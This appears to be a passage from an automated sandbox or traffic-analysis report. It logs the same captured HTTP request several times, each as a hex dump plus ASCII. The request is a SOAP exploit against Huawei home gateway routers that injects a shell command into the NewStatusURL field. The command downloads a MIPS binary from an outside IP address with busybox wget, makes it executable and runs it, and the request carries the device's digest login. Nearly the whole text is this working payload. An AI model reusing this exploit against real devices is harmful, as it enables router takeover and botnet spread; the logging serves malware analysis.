77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
